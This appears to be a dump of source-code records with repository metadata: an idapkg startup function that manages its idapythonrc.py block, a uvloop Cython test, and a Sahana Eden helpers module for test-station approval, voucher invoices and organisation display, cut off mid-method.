f.write(py)
def init_environment(_load=True):
"""
Must be called from idapythonrc.py. I didn't test other cases.
"""
log.info("idapkg version %s" % __version__)
update_pythonrc()
prepare_virtualenv(g['path']['virtualenv'])
ifred = LocalPackage.by_name('ifred')
if ifred:
ifred.load()
from . import actions
for pkg in LocalPackage.all():
pkg.populate_env()
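# For illustration only: after update_pythonrc() runs, the idapythonrc.py inside
# ida_diskio.get_user_idadir() carries a managed block delimited by the SEP
# markers, roughly:
#
#   # idapkg version: <__version__>
#   <RC bootstrap payload>
#   # idapkg end
#
# On a version bump the old block is stripped via the SEP markers and a fresh one
# is prepended, so the rc file never accumulates duplicate bootstrap code.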
| 27.864583
| 81
| 0.608224
|
bc6555ffc0e998f2ec4e2961a4b8599793b282da
| 1,119
|
py
|
Python
|
tests/test_cython.py
|
Psycojoker/uvloop
|
03487c80a508ea92e66f976fa196e64514894205
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
tests/test_cython.py
|
Psycojoker/uvloop
|
03487c80a508ea92e66f976fa196e64514894205
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
tests/test_cython.py
|
Psycojoker/uvloop
|
03487c80a508ea92e66f976fa196e64514894205
|
[
"Apache-2.0",
"MIT"
] | 1
|
2019-09-24T18:25:43.000Z
|
2019-09-24T18:25:43.000Z
|
import asyncio
from uvloop._testbase import UVTestCase
class TestCythonIntegration(UVTestCase):
def test_cython_coro_is_coroutine(self):
from uvloop.loop import _test_coroutine_1
from asyncio.coroutines import _format_coroutine
coro = _test_coroutine_1()
self.assertTrue(
_format_coroutine(coro).startswith('_test_coroutine_1() done'))
self.assertEqual(_test_coroutine_1.__qualname__, '_test_coroutine_1')
self.assertEqual(_test_coroutine_1.__name__, '_test_coroutine_1')
self.assertTrue(asyncio.iscoroutine(coro))
fut = asyncio.ensure_future(coro, loop=self.loop)
self.assertTrue(isinstance(fut, asyncio.Future))
self.assertTrue(isinstance(fut, asyncio.Task))
fut.cancel()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(fut)
try:
_format_coroutine(coro) # This line checks against Cython segfault
except TypeError:
# TODO: Fix Cython to not reset __name__/__qualname__ to None
pass
coro.close()
| 33.909091
| 79
| 0.691689
|
c9076aae20a1309d440fe81fd01cd897728b6782
| 87,564
|
py
|
Python
|
modules/templates/RLPPTM/helpers.py
|
armin11/eden
|
70834282bc1dee7d1bc00ea617c384755f3bf806
|
[
"MIT"
] | 1
|
2021-08-11T13:52:57.000Z
|
2021-08-11T13:52:57.000Z
|
modules/templates/RLPPTM/helpers.py
|
armin11/eden
|
70834282bc1dee7d1bc00ea617c384755f3bf806
|
[
"MIT"
] | 1
|
2021-07-19T05:05:48.000Z
|
2021-07-19T05:05:48.000Z
|
modules/templates/RLPPTM/helpers.py
|
armin11/eden
|
70834282bc1dee7d1bc00ea617c384755f3bf806
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Helper functions and classes for RLPPTM template
@license: MIT
"""
import json
from gluon import current, Field, URL, \
CRYPT, IS_EMAIL, IS_IN_SET, IS_LOWER, IS_NOT_IN_DB, \
SQLFORM, A, DIV, H4, H5, I, INPUT, LI, P, SPAN, TABLE, TD, TH, TR, UL
from s3 import ICON, IS_FLOAT_AMOUNT, JSONERRORS, S3DateTime, \
S3Method, S3Represent, s3_fullname, s3_mark_required, s3_str
from s3db.pr import pr_PersonRepresentContact, pr_default_realms
# =============================================================================
def get_role_realms(role):
"""
Get all realms for which a role has been assigned
@param role: the role ID or role UUID
@returns: list of pe_ids the current user has the role for,
None if the role is assigned site-wide, or an
empty list if the user does not have the role, or
no realm for the role
"""
db = current.db
auth = current.auth
s3db = current.s3db
if isinstance(role, str):
gtable = auth.settings.table_group
query = (gtable.uuid == role) & \
(gtable.deleted == False)
row = db(query).select(gtable.id,
cache = s3db.cache,
limitby = (0, 1),
).first()
role_id = row.id if row else None
else:
role_id = role
role_realms = []
user = auth.user
if user:
role_realms = user.realms.get(role_id, role_realms)
return role_realms
# =============================================================================
def get_managed_facilities(role="ORG_ADMIN", public_only=True):
"""
Get test stations managed by the current user
@param role: the user role to consider
@param public_only: only include sites with PUBLIC=Y tag
@returns: list of site_ids
"""
s3db = current.s3db
ftable = s3db.org_facility
query = (ftable.obsolete == False) & \
(ftable.deleted == False)
realms = get_role_realms(role)
if realms:
query = (ftable.realm_entity.belongs(realms)) & query
elif realms is not None:
# User does not have the required role, or at least not for any realms
return realms
if public_only:
ttable = s3db.org_site_tag
join = ttable.on((ttable.site_id == ftable.site_id) & \
(ttable.tag == "PUBLIC") & \
(ttable.deleted == False))
query &= (ttable.value == "Y")
else:
join = None
sites = current.db(query).select(ftable.site_id,
cache = s3db.cache,
join = join,
)
return [s.site_id for s in sites]
# =============================================================================
def get_org_accounts(organisation_id):
"""
Get all user accounts linked to an organisation
@param organisation_id: the organisation ID
@returns: tuple (active, disabled, invited), each being
a list of user accounts (auth_user Rows)
"""
auth = current.auth
s3db = current.s3db
utable = auth.settings.table_user
oltable = s3db.org_organisation_user
pltable = s3db.pr_person_user
join = oltable.on((oltable.user_id == utable.id) & \
(oltable.deleted == False))
left = pltable.on((pltable.user_id == utable.id) & \
(pltable.deleted == False))
query = (oltable.organisation_id == organisation_id)
rows = current.db(query).select(utable.id,
utable.first_name,
utable.last_name,
utable.email,
utable.registration_key,
pltable.pe_id,
join = join,
left = left,
)
active, disabled, invited = [], [], []
for row in rows:
user = row[utable]
person_link = row.pr_person_user
if person_link.pe_id:
if user.registration_key:
disabled.append(user)
else:
active.append(user)
else:
invited.append(user)
return active, disabled, invited
# -----------------------------------------------------------------------------
def get_role_users(role_uid, pe_id=None, organisation_id=None):
"""
Look up users with a certain user role for a certain organisation
@param role_uid: the role UUID
@param pe_id: the pe_id of the organisation, or
@param organisation_id: the organisation_id
@returns: a dict {user_id: pe_id} of all active users with this
role for the organisation
"""
db = current.db
auth = current.auth
s3db = current.s3db
if not pe_id and organisation_id:
# Look up the realm pe_id from the organisation
otable = s3db.org_organisation
query = (otable.id == organisation_id) & \
(otable.deleted == False)
organisation = db(query).select(otable.pe_id,
limitby = (0, 1),
).first()
pe_id = organisation.pe_id if organisation else None
# Get all users with this realm as direct OU ancestor
from s3db.pr import pr_realm_users
users = pr_realm_users(pe_id) if pe_id else None
if users:
# Look up those among the realm users who have
# the role for either pe_id or for their default realm
gtable = auth.settings.table_group
mtable = auth.settings.table_membership
ltable = s3db.pr_person_user
utable = auth.settings.table_user
join = [mtable.on((mtable.user_id == ltable.user_id) & \
((mtable.pe_id == None) | (mtable.pe_id == pe_id)) & \
(mtable.deleted == False)),
gtable.on((gtable.id == mtable.group_id) & \
(gtable.uuid == role_uid)),
# Only verified+active accounts:
utable.on((utable.id == mtable.user_id) & \
((utable.registration_key == None) | \
(utable.registration_key == "")))
]
query = (ltable.user_id.belongs(set(users.keys()))) & \
(ltable.deleted == False)
rows = db(query).select(ltable.user_id,
ltable.pe_id,
join = join,
)
users = {row.user_id: row.pe_id for row in rows}
return users if users else None
# -----------------------------------------------------------------------------
def get_role_emails(role_uid, pe_id=None, organisation_id=None):
"""
Look up the emails addresses of users with a certain user role
for a certain organisation
@param role_uid: the role UUID
@param pe_id: the pe_id of the organisation, or
@param organisation_id: the organisation_id
@returns: a list of email addresses
"""
contacts = None
users = get_role_users(role_uid,
pe_id = pe_id,
organisation_id = organisation_id,
)
if users:
# Look up their email addresses
ctable = current.s3db.pr_contact
query = (ctable.pe_id.belongs(set(users.values()))) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
rows = current.db(query).select(ctable.value,
orderby = ~ctable.priority,
)
contacts = list(set(row.value for row in rows))
return contacts if contacts else None
# -----------------------------------------------------------------------------
def get_role_hrs(role_uid, pe_id=None, organisation_id=None):
"""
Look up the HR records of users with a certain user role
for a certain organisation
@param role_uid: the role UUID
@param pe_id: the pe_id of the organisation, or
@param organisation_id: the organisation_id
@returns: a list of hrm_human_resource IDs
"""
hr_ids = None
users = get_role_users(role_uid,
pe_id = pe_id,
organisation_id = organisation_id,
)
if users:
# Look up their HR records
s3db = current.s3db
ptable = s3db.pr_person
htable = s3db.hrm_human_resource
join = htable.on((htable.person_id == ptable.id) & \
(htable.deleted == False))
query = (ptable.pe_id.belongs(set(users.values()))) & \
(ptable.deleted == False)
rows = current.db(query).select(htable.id,
join = join,
)
hr_ids = list(set(row.id for row in rows))
return hr_ids if hr_ids else None
# -----------------------------------------------------------------------------
def assign_pending_invoices(billing_id, organisation_id=None, invoice_id=None):
"""
Auto-assign pending invoices in a billing to accountants,
taking into account their current workload
@param billing_id: the billing ID
@param organisation_id: the ID of the accountant organisation
@param invoice_id: assign only this invoice
"""
db = current.db
s3db = current.s3db
if not organisation_id:
# Look up the accounting organisation for the billing
btable = s3db.fin_voucher_billing
query = (btable.id == billing_id)
billing = db(query).select(btable.organisation_id,
limitby = (0, 1),
).first()
if not billing:
return
organisation_id = billing.organisation_id
if organisation_id:
# Look up the active accountants of the accountant org
accountants = get_role_hrs("PROGRAM_ACCOUNTANT",
organisation_id = organisation_id,
)
else:
accountants = None
# Query for any pending invoices of this billing cycle
itable = s3db.fin_voucher_invoice
if invoice_id:
query = (itable.id == invoice_id)
else:
query = (itable.billing_id == billing_id)
query &= (itable.status != "PAID") & (itable.deleted == False)
if accountants:
# Limit to invoices that have not yet been assigned to any
# of the accountants in charge:
query &= ((itable.human_resource_id == None) | \
(~(itable.human_resource_id.belongs(accountants))))
# Get the invoices
invoices = db(query).select(itable.id,
itable.human_resource_id,
)
if not invoices:
return
# Look up the number of pending invoices assigned to each
# accountant, to get a measure for their current workload
workload = {hr_id: 0 for hr_id in accountants}
query = (itable.status != "PAID") & \
(itable.human_resource_id.belongs(accountants)) & \
(itable.deleted == False)
num_assigned = itable.id.count()
rows = db(query).select(itable.human_resource_id,
num_assigned,
groupby = itable.human_resource_id,
)
for row in rows:
workload[row[itable.human_resource_id]] = row[num_assigned]
# Re-assign invoices
# - try to distribute workload evenly among the accountants
for invoice in invoices:
hr_id, num = min(workload.items(), key=lambda item: item[1])
invoice.update_record(human_resource_id = hr_id)
workload[hr_id] = num + 1
elif not invoice_id:
# Unassign all pending invoices
db(query).update(human_resource_id = None)
# -----------------------------------------------------------------------------
def check_invoice_integrity(row):
"""
Rheader-helper to check and report invoice integrity
@param row: the invoice record
@returns: integrity check result
"""
billing = current.s3db.fin_VoucherBilling(row.billing_id)
try:
checked = billing.check_invoice(row.id)
except ValueError:
checked = False
T = current.T
if checked:
return SPAN(T("Ok"),
I(_class="fa fa-check"),
_class="record-integrity-ok",
)
else:
current.response.error = T("This invoice may be invalid - please contact the administrator")
return SPAN(T("Failed"),
I(_class="fa fa-exclamation-triangle"),
_class="record-integrity-broken",
)
# -----------------------------------------------------------------------------
def get_stats_projects():
"""
Find all projects the current user can report test results, i.e.
- projects marked as STATS=Y where
- the current user has the VOUCHER_PROVIDER role for a partner organisation
@status: obsolete, test results shall be reported for all projects
"""
permitted_realms = current.auth.permission.permitted_realms
realms = permitted_realms("disease_case_diagnostics",
method = "create",
c = "disease",
f = "case_diagnostics",
)
if realms is not None and not realms:
return []
s3db = current.s3db
otable = s3db.org_organisation
ltable = s3db.project_organisation
ttable = s3db.project_project_tag
oquery = otable.deleted == False
if realms:
oquery = otable.pe_id.belongs(realms) & oquery
join = [ltable.on((ltable.project_id == ttable.project_id) & \
(ltable.deleted == False)),
otable.on((otable.id == ltable.organisation_id) & oquery),
]
query = (ttable.tag == "STATS") & \
(ttable.value == "Y") & \
(ttable.deleted == False)
rows = current.db(query).select(ttable.project_id,
cache = s3db.cache,
join = join,
groupby = ttable.project_id,
)
return [row.project_id for row in rows]
# -----------------------------------------------------------------------------
def can_cancel_debit(debit):
"""
Check whether the current user is entitled to cancel a certain
voucher debit:
* User must have the VOUCHER_PROVIDER role for the organisation
that originally accepted the voucher (not even ADMIN-role can
override this requirement)
@param debit: the debit (Row, must contain the debit pe_id)
@returns: True|False
"""
auth = current.auth
user = auth.user
if user:
# Look up the role ID
gtable = auth.settings.table_group
query = (gtable.uuid == "VOUCHER_PROVIDER")
role = current.db(query).select(gtable.id,
cache = current.s3db.cache,
limitby = (0, 1),
).first()
if not role:
return False
# Get the realms they have this role for
realms = user.realms
if role.id in realms:
role_realms = realms.get(role.id)
else:
# They don't have the role at all
return False
if not role_realms:
# User has a site-wide VOUCHER_PROVIDER role, however
# for cancellation of debits they must be affiliated
# with the debit owner organisation
role_realms = pr_default_realms(user["pe_id"])
return debit.pe_id in role_realms
else:
# No user
return False
# -----------------------------------------------------------------------------
def configure_binary_tags(resource, tag_components):
"""
Configure representation of binary tags
@param resource: the S3Resource
@param tag_components: tuple|list of filtered tag component aliases
"""
T = current.T
binary_tag_opts = {"Y": T("Yes"), "N": T("No")}
for cname in tag_components:
component = resource.components.get(cname)
if component:
ctable = component.table
field = ctable.value
field.default = "N"
field.requires = IS_IN_SET(binary_tag_opts, zero=None)
field.represent = lambda v, row=None: binary_tag_opts.get(v, "-")
# -----------------------------------------------------------------------------
def workflow_tag_represent(options):
"""
Color-coded and icon-supported representation of
facility approval workflow tags
@param options: the tag options as dict {value: label}
"""
icons = {"REVISE": "fa fa-exclamation-triangle",
"REVIEW": "fa fa-hourglass",
"APPROVED": "fa fa-check",
"N": "fa fa-minus-circle",
"Y": "fa fa-check",
}
css_classes = {"REVISE": "workflow-red",
"REVIEW": "workflow-amber",
"APPROVED": "workflow-green",
"N": "workflow-red",
"Y": "workflow-green",
}
def represent(value, row=None):
label = DIV(_class="approve-workflow")
color = css_classes.get(value)
if color:
label.add_class(color)
icon = icons.get(value)
if icon:
label.append(I(_class=icon))
label.append(options.get(value, "-"))
return label
return represent
# -----------------------------------------------------------------------------
def configure_workflow_tags(resource, role="applicant", record_id=None):
"""
Configure facility approval workflow tags
@param resource: the org_facility resource
@param role: the user's role in the workflow (applicant|approver)
@param record_id: the facility record ID
@returns: the list of visible workflow tags [(label, selector)]
"""
T = current.T
components = resource.components
visible_tags = []
# Configure STATUS tag
status_tag_opts = {"REVISE": T("Completion/Adjustment Required"),
"READY": T("Ready for Review"),
"REVIEW": T("Review Pending"),
"APPROVED": T("Approved##actionable"),
}
selectable = None
status_visible = False
review_tags_visible = False
if role == "applicant" and record_id:
# Check current status
db = current.db
s3db = current.s3db
ftable = s3db.org_facility
ttable = s3db.org_site_tag
join = ftable.on((ftable.site_id == ttable.site_id) & \
(ftable.id == record_id))
query = (ttable.tag == "STATUS") & (ttable.deleted == False)
row = db(query).select(ttable.value, join=join, limitby=(0, 1)).first()
if row:
if row.value == "REVISE":
review_tags_visible = True
selectable = (row.value, "READY")
elif row.value == "REVIEW":
review_tags_visible = True
status_visible = True
component = components.get("status")
if component:
ctable = component.table
field = ctable.value
field.default = "REVISE"
field.readable = status_visible
if status_visible:
if selectable:
selectable_statuses = [(status, status_tag_opts[status])
for status in selectable]
field.requires = IS_IN_SET(selectable_statuses, zero=None)
field.writable = True
else:
field.writable = False
visible_tags.append((T("Processing Status"), "status.value"))
field.represent = workflow_tag_represent(status_tag_opts)
# Configure review tags
review_tag_opts = (("REVISE", T("Completion/Adjustment Required")),
("REVIEW", T("Review Pending")),
("APPROVED", T("Approved##actionable")),
)
selectable = review_tag_opts if role == "approver" else None
review_tags = (("mpav", T("MPAV Qualification")),
("hygiene", T("Hygiene Plan")),
("layout", T("Facility Layout Plan")),
)
for cname, label in review_tags:
component = components.get(cname)
if component:
ctable = component.table
field = ctable.value
field.default = "REVISE"
if selectable:
field.requires = IS_IN_SET(selectable, zero=None, sort=False)
field.readable = field.writable = True
else:
field.readable = review_tags_visible
field.writable = False
if field.readable:
visible_tags.append((label, "%s.value" % cname))
field.represent = workflow_tag_represent(dict(review_tag_opts))
# Configure PUBLIC tag
binary_tag_opts = {"Y": T("Yes"),
"N": T("No"),
}
selectable = binary_tag_opts if role == "approver" else None
component = resource.components.get("public")
if component:
ctable = component.table
field = ctable.value
field.default = "N"
if selectable:
field.requires = IS_IN_SET(selectable, zero=None)
field.writable = True
else:
field.requires = IS_IN_SET(binary_tag_opts, zero=None)
field.writable = False
field.represent = workflow_tag_represent(binary_tag_opts)
visible_tags.append((T("In Public Registry"), "public.value"))
visible_tags.append("site_details.authorisation_advice")
return visible_tags
# -----------------------------------------------------------------------------
def facility_approval_workflow(site_id):
"""
Update facility approval workflow tags
@param site_id: the site ID
"""
db = current.db
s3db = current.s3db
workflow = ("STATUS", "MPAV", "HYGIENE", "LAYOUT", "PUBLIC")
review = ("MPAV", "HYGIENE", "LAYOUT")
# Get all tags for site
ttable = s3db.org_site_tag
query = (ttable.site_id == site_id) & \
(ttable.tag.belongs(workflow)) & \
(ttable.deleted == False)
rows = db(query).select(ttable.id,
ttable.tag,
ttable.value,
)
tags = {row.tag: row.value for row in rows}
if any(k not in tags for k in workflow):
ftable = s3db.org_facility
facility = db(ftable.site_id == site_id).select(ftable.id,
limitby = (0, 1),
).first()
        if facility:
            # Create the missing default tags, then restart with a complete tag set
            add_facility_default_tags(facility.id)
            facility_approval_workflow(site_id)
        return
update = {}
notify = False
status = tags.get("STATUS")
if status == "REVISE":
if all(tags[k] == "APPROVED" for k in review):
update["PUBLIC"] = "Y"
update["STATUS"] = "APPROVED"
notify = True
elif any(tags[k] == "REVIEW" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVIEW"
else:
update["PUBLIC"] = "N"
# Keep status REVISE
elif status == "READY":
update["PUBLIC"] = "N"
if all(tags[k] == "APPROVED" for k in review):
for k in review:
update[k] = "REVIEW"
else:
for k in review:
if tags[k] == "REVISE":
update[k] = "REVIEW"
update["STATUS"] = "REVIEW"
elif status == "REVIEW":
if all(tags[k] == "APPROVED" for k in review):
update["PUBLIC"] = "Y"
update["STATUS"] = "APPROVED"
notify = True
elif any(tags[k] == "REVIEW" for k in review):
update["PUBLIC"] = "N"
# Keep status REVIEW
elif any(tags[k] == "REVISE" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVISE"
notify = True
elif status == "APPROVED":
if any(tags[k] == "REVIEW" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVIEW"
elif any(tags[k] == "REVISE" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVISE"
notify = True
for row in rows:
key = row.tag
if key in update:
row.update_record(value=update[key])
T = current.T
public = update.get("PUBLIC")
if public and public != tags["PUBLIC"]:
if public == "Y":
msg = T("Facility added to public registry")
else:
msg = T("Facility removed from public registry pending review")
current.response.information = msg
# Send Notifications
if notify:
tags.update(update)
msg = facility_review_notification(site_id, tags)
if msg:
current.response.warning = \
T("Test station could not be notified: %(error)s") % {"error": msg}
else:
current.response.flash = \
T("Test station notified")
# -----------------------------------------------------------------------------
def facility_review_notification(site_id, tags):
"""
Notify the OrgAdmin of a test station about the status of the review
@param site_id: the test facility site ID
@param tags: the current workflow tags
@returns: error message on error, else None
"""
db = current.db
s3db = current.s3db
# Lookup the facility
ftable = s3db.org_facility
query = (ftable.site_id == site_id) & \
(ftable.deleted == False)
facility = db(query).select(ftable.id,
ftable.name,
ftable.organisation_id,
limitby = (0, 1),
).first()
if not facility:
return "Facility not found"
organisation_id = facility.organisation_id
if not organisation_id:
return "Organisation not found"
# Find the OrgAdmin email addresses
email = get_role_emails("ORG_ADMIN",
organisation_id = organisation_id,
)
if not email:
return "No Organisation Administrator found"
# Data for the notification email
data = {"name": facility.name,
"url": URL(c = "org",
f = "organisation",
args = [organisation_id, "facility", facility.id],
host = True,
),
}
status = tags.get("STATUS")
if status == "REVISE":
template = "FacilityReview"
# Add advice
dtable = s3db.org_site_details
query = (dtable.site_id == site_id) & \
(dtable.deleted == False)
details = db(query).select(dtable.authorisation_advice,
limitby = (0, 1),
).first()
if details and details.authorisation_advice:
data["advice"] = details.authorisation_advice
# Add explanations for relevant requirements
review = (("MPAV", "FacilityMPAVRequirements"),
("HYGIENE", "FacilityHygienePlanRequirements"),
("LAYOUT", "FacilityLayoutRequirements"),
)
ctable = s3db.cms_post
ltable = s3db.cms_post_module
join = ltable.on((ltable.post_id == ctable.id) & \
(ltable.module == "org") & \
(ltable.resource == "facility") & \
(ltable.deleted == False))
explanations = []
for tag, requirements in review:
if tags.get(tag) == "REVISE":
query = (ctable.name == requirements) & \
(ctable.deleted == False)
row = db(query).select(ctable.body,
join = join,
limitby = (0, 1),
).first()
if row:
explanations.append(row.body)
data["explanations"] = "\n\n".join(explanations) if explanations else "-"
elif status == "APPROVED":
template = "FacilityApproved"
else:
# No notifications for this status
return "invalid status"
# Lookup email address of current user
from .notifications import CMSNotifications
auth = current.auth
if auth.user:
cc = CMSNotifications.lookup_contact(auth.user.pe_id)
else:
cc = None
# Send CMS Notification FacilityReview
return CMSNotifications.send(email,
template,
data,
module = "org",
resource = "facility",
cc = cc,
)
# -----------------------------------------------------------------------------
def add_organisation_default_tags(organisation_id):
"""
Add default tags to a new organisation
@param organisation_id: the organisation record ID
"""
db = current.db
s3db = current.s3db
# Add default tags
otable = s3db.org_organisation
ttable = s3db.org_organisation_tag
dttable = ttable.with_alias("delivery")
ittable = ttable.with_alias("orgid")
left = [dttable.on((dttable.organisation_id == otable.id) & \
(dttable.tag == "DELIVERY") & \
(dttable.deleted == False)),
ittable.on((ittable.organisation_id == otable.id) & \
(ittable.tag == "OrgID") & \
(ittable.deleted == False)),
]
query = (otable.id == organisation_id)
row = db(query).select(otable.id,
otable.uuid,
dttable.id,
ittable.id,
left = left,
limitby = (0, 1),
).first()
if row:
org = row.org_organisation
# Add DELIVERY-tag
dtag = row.delivery
if not dtag.id:
ttable.insert(organisation_id = org.id,
tag = "DELIVERY",
value = "DIRECT",
)
# Add OrgID-tag
itag = row.orgid
if not itag.id:
try:
uid = int(org.uuid[9:14], 16)
except (TypeError, ValueError):
import uuid
uid = int(uuid.uuid4().urn[9:14], 16)
value = "%06d%04d" % (uid, org.id)
ttable.insert(organisation_id = org.id,
tag = "OrgID",
value = value,
)
# -----------------------------------------------------------------------------
def add_facility_default_tags(facility_id, approve=False):
"""
Add default tags to a new facility
@param facility_id: the facility record ID
@param approve: whether called from approval-workflow
"""
db = current.db
s3db = current.s3db
ftable = s3db.org_facility
ttable = s3db.org_site_tag
workflow = ("PUBLIC", "MPAV", "HYGIENE", "LAYOUT", "STATUS")
left = ttable.on((ttable.site_id == ftable.site_id) & \
(ttable.tag.belongs(workflow)) & \
(ttable.deleted == False))
query = (ftable.id == facility_id)
rows = db(query).select(ftable.site_id,
ttable.id,
ttable.tag,
ttable.value,
left = left,
)
if not rows:
return
else:
site_id = rows.first().org_facility.site_id
existing = {row.org_site_tag.tag: row.org_site_tag.value
for row in rows if row.org_site_tag.id}
public = existing.get("PUBLIC") == "Y" or approve
review = ("MPAV", "HYGIENE", "LAYOUT")
for tag in workflow:
if tag in existing:
continue
elif tag == "PUBLIC":
default = "Y" if public else "N"
elif tag == "STATUS":
if any(existing[t] == "REVISE" for t in review):
default = "REVISE"
elif any(existing[t] == "REVIEW" for t in review):
default = "REVIEW"
else:
default = "APPROVED" if public else "REVIEW"
else:
default = "APPROVED" if public else "REVISE"
ttable.insert(site_id = site_id,
tag = tag,
value = default,
)
existing[tag] = default
# -----------------------------------------------------------------------------
def set_facility_code(facility_id):
"""
Generate and set a unique facility code
@param facility_id: the facility ID
@returns: the facility code
"""
db = current.db
s3db = current.s3db
table = s3db.org_facility
query = (table.id == facility_id)
facility = db(query).select(table.id,
table.uuid,
table.code,
limitby = (0, 1),
).first()
if not facility or facility.code:
return None
try:
uid = int(facility.uuid[9:14], 16) % 1000000
except (TypeError, ValueError):
import uuid
uid = int(uuid.uuid4().urn[9:14], 16) % 1000000
# Generate code
import random
suffix = "".join(random.choice("ABCFGHKLNPRSTWX12456789") for _ in range(3))
code = "%06d-%s" % (uid, suffix)
facility.update_record(code=code)
return code
# -----------------------------------------------------------------------------
def applicable_org_types(organisation_id, group=None, represent=False):
"""
Look up organisation types by OrgGroup-tag
@param organisation_id: the record ID of an existing organisation
@param group: alternatively, the organisation group name
@param represent: include type labels in the result
@returns: a list of organisation type IDs, for filtering,
or a dict {type_id: label}, for selecting
"""
db = current.db
s3db = current.s3db
ttable = s3db.org_organisation_type_tag
if organisation_id:
# Look up the org groups of this record
gtable = s3db.org_group
mtable = s3db.org_group_membership
join = gtable.on(gtable.id == mtable.group_id)
query = (mtable.organisation_id == organisation_id) & \
(mtable.deleted == False)
rows = db(query).select(gtable.name, join=join)
groups = {row.name for row in rows}
q = (ttable.value.belongs(groups))
# Look up the org types the record is currently linked to
ltable = s3db.org_organisation_organisation_type
query = (ltable.organisation_id == organisation_id) & \
(ltable.deleted == False)
rows = db(query).select(ltable.organisation_type_id)
current_types = {row.organisation_type_id for row in rows}
elif group:
# Use group name as-is
q = (ttable.value == group)
# Look up all types tagged for this group
query = (ttable.tag == "OrgGroup") & q & \
(ttable.deleted == False)
rows = db(query).select(ttable.organisation_type_id,
cache = s3db.cache,
)
type_ids = {row.organisation_type_id for row in rows}
if organisation_id:
# Add the org types the record is currently linked to
type_ids |= current_types
if represent:
labels = ttable.organisation_type_id.represent
if hasattr(labels, "bulk"):
labels.bulk(list(type_ids))
output = {str(t): labels(t) for t in type_ids}
else:
output = list(type_ids)
return output
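    # Usage sketch (the group name is a hypothetical example, not a fixed value):
    #   type_ids = applicable_org_types(organisation_id)                # list of type IDs for filtering
    #   options = applicable_org_types(None, group="TESTSTATIONS",
    #                                  represent=True)                  # {type_id: label} for selectors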
# =============================================================================
def facility_map_popup(record):
"""
Custom map popup for facilities
@param record: the facility record (Row)
@returns: the map popup contents as DIV
"""
db = current.db
s3db = current.s3db
T = current.T
table = s3db.org_facility
# Custom Map Popup
title = H4(record.name, _class="map-popup-title")
details = TABLE(_class="map-popup-details")
append = details.append
def formrow(label, value, represent=None):
return TR(TD("%s:" % label, _class="map-popup-label"),
TD(represent(value) if represent else value),
)
# Address
gtable = s3db.gis_location
query = (gtable.id == record.location_id)
location = db(query).select(gtable.addr_street,
gtable.addr_postcode,
gtable.L4,
gtable.L3,
limitby = (0, 1),
).first()
if location.addr_street:
append(formrow(gtable.addr_street.label, location.addr_street))
place = location.L4 or location.L3 or "?"
if location.addr_postcode:
place = "%s %s" % (location.addr_postcode, place)
append(formrow(T("Place"), place))
# Phone number
phone = record.phone1
if phone:
append(formrow(T("Phone"), phone))
# Email address (as hyperlink)
email = record.email
if email:
append(formrow(table.email.label, A(email, _href="mailto:%s" % email)))
# Opening Times
opening_times = record.opening_times
if opening_times:
append(formrow(table.opening_times.label, opening_times))
# Site services
stable = s3db.org_service
ltable = s3db.org_service_site
join = stable.on(stable.id == ltable.service_id)
query = (ltable.site_id == record.site_id) & \
(ltable.deleted == False)
rows = db(query).select(stable.name, join=join)
services = [row.name for row in rows]
if services:
append(formrow(T("Services"), ", ".join(services)))
# Comments
if record.comments:
append(formrow(table.comments.label,
record.comments,
represent = table.comments.represent,
))
return DIV(title, details, _class="map-popup")
# =============================================================================
class ServiceListRepresent(S3Represent):
always_list = True
def render_list(self, value, labels, show_link=True):
"""
Helper method to render list-type representations from
bulk()-results.
@param value: the list
@param labels: the labels as returned from bulk()
@param show_link: render references as links, should
be the same as used with bulk()
"""
show_link = show_link and self.show_link
values = [v for v in value if v is not None]
if not len(values):
return ""
if show_link:
labels_ = (labels[v] if v in labels else self.default for v in values)
else:
labels_ = sorted(s3_str(labels[v]) if v in labels else self.default for v in values)
html = UL(_class="service-list")
for label in labels_:
html.append(LI(label))
return html
# =============================================================================
class OrganisationRepresent(S3Represent):
"""
Custom representation of organisations showing the organisation type
- relevant for facility approval
"""
def __init__(self, show_type=True, show_link=True):
super(OrganisationRepresent, self).__init__(lookup = "org_organisation",
fields = ["name",],
show_link = show_link,
)
self.show_type = show_type
self.org_types = {}
self.type_names = {}
# -------------------------------------------------------------------------
def lookup_rows(self, key, values, fields=None):
"""
            Custom lookup method for organisation rows, also looks
            up the organisation types if show_type is enabled.
            Parameters key and fields are not used, but are kept
            for API compatibility reasons.
@param values: the organisation IDs
"""
db = current.db
s3db = current.s3db
otable = s3db.org_organisation
count = len(values)
if count == 1:
query = (otable.id == values[0])
else:
query = (otable.id.belongs(values))
rows = db(query).select(otable.id,
otable.name,
limitby = (0, count),
)
if self.show_type:
ltable = s3db.org_organisation_organisation_type
if count == 1:
query = (ltable.organisation_id == values[0])
else:
query = (ltable.organisation_id.belongs(values))
query &= (ltable.deleted == False)
types = db(query).select(ltable.organisation_id,
ltable.organisation_type_id,
)
all_types = set()
org_types = self.org_types = {}
for t in types:
type_id = t.organisation_type_id
all_types.add(type_id)
organisation_id = t.organisation_id
if organisation_id not in org_types:
org_types[organisation_id] = {type_id}
else:
org_types[organisation_id].add(type_id)
if all_types:
ttable = s3db.org_organisation_type
query = ttable.id.belongs(all_types)
types = db(query).select(ttable.id,
ttable.name,
limitby = (0, len(all_types)),
)
self.type_names = {t.id: t.name for t in types}
return rows
# -------------------------------------------------------------------------
def represent_row(self, row, prefix=None):
"""
Represent a single Row
@param row: the org_organisation Row
@param prefix: the hierarchy prefix (unused here)
"""
name = s3_str(row.name)
if self.show_type:
T = current.T
type_ids = self.org_types.get(row.id)
if type_ids:
type_names = self.type_names
types = [s3_str(T(type_names[t]))
for t in type_ids if t in type_names
]
name = "%s (%s)" % (name, ", ".join(types))
return name
# =============================================================================
class ContactRepresent(pr_PersonRepresentContact):
"""
Visually enhanced version of pr_PersonRepresentContact
"""
def represent_row(self, row):
"""
Represent a row
@param row: the Row
"""
output = DIV(SPAN(s3_fullname(row),
_class = "contact-name",
),
_class = "contact-repr",
)
try:
pe_id = row.pe_id
except AttributeError:
pass
else:
if self.show_email:
email = self._email.get(pe_id)
if self.show_phone:
